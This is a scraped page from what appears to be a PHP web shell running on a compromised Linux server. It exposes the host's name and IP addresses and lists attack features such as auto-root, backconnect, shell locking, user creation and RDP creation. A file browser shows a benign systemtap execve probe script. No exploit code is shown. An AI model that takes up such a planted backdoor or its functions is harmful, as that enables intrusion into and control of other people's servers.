Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.54
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
systemtap /
tapset /
linux /
x86_64 /
[ HOME SHELL ]
Name
Size
Permission
Action
aux_syscalls.stp
3.58
KB
-rw-r--r--
sysc_arch_prctl.stp
3.21
KB
-rw-r--r--
sysc_compat_execve.stp
1.59
KB
-rw-r--r--
sysc_compat_fadvise64.stp
6.92
KB
-rw-r--r--
sysc_compat_fallocate.stp
3.54
KB
-rw-r--r--
sysc_compat_ftruncate64.stp
3.34
KB
-rw-r--r--
sysc_compat_lookup_dcookie.stp
3.72
KB
-rw-r--r--
sysc_compat_readahead.stp
3.18
KB
-rw-r--r--
sysc_compat_truncate64.stp
3.45
KB
-rw-r--r--
sysc_execve.stp
1.62
KB
-rw-r--r--
sysc_get_thread_area.stp
3.18
KB
-rw-r--r--
sysc_iopl.stp
2.27
KB
-rw-r--r--
sysc_mmap.stp
4.04
KB
-rw-r--r--
sysc_mmap2.stp
2.62
KB
-rw-r--r--
sysc_pipe32.stp
1.54
KB
-rw-r--r--
sysc_set_thread_area.stp
3.13
KB
-rw-r--r--
sysc_sigaltstack.stp
2.24
KB
-rw-r--r--
sysc_sysctl32.stp
1.12
KB
-rw-r--r--
sysc_vm86_warning.stp
1.17
KB
-rw-r--r--
syscall_num.stp
53.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sysc_execve.stp
%( kernel_v < "3.7" %? # execve _____________________________________________________ # # In kernels < 3.7, sys_execve() was in arch-specific code (and had # varying arguments). It was just a wrapper around generic # do_execve(), but the wrapper could error out before calling # do_execve(). So, we'll have to handle it in arch-specific tapset # code to catch all calls. # # long sys_execve(char __user *name, char __user * __user *argv, # char __user * __user *envp, struct pt_regs regs) @define _SYSCALL_EXECVE_NAME %( name = "execve" %) @define _SYSCALL_EXECVE_ARGSTR %( argstr = sprintf("%s, %s, %s", filename, args, env_str) %) probe syscall.execve = dw_syscall.execve !, nd_syscall.execve {} probe syscall.execve.return = dw_syscall.execve.return !, nd_syscall.execve.return {} # dw_execve _____________________________________________________ probe dw_syscall.execve = kernel.function("sys_execve").call { @_SYSCALL_EXECVE_NAME filename = user_string_quoted($name) args = __get_argv($argv, 0) env_str = __get_argv($envp, 0) @_SYSCALL_EXECVE_ARGSTR } probe dw_syscall.execve.return = kernel.function("sys_execve").return { @_SYSCALL_EXECVE_NAME @SYSC_RETVALSTR($return) } # nd_execve _____________________________________________________ probe nd_syscall.execve = kprobe.function("sys_execve") { @_SYSCALL_EXECVE_NAME filename = user_string_quoted(pointer_arg(1)) args = __get_argv(pointer_arg(2), 0) env_str = __get_argv(pointer_arg(3), 0) @_SYSCALL_EXECVE_ARGSTR } probe nd_syscall.execve.return = kprobe.function("sys_execve").return { @_SYSCALL_EXECVE_NAME @SYSC_RETVALSTR(returnval()) } %)
Close
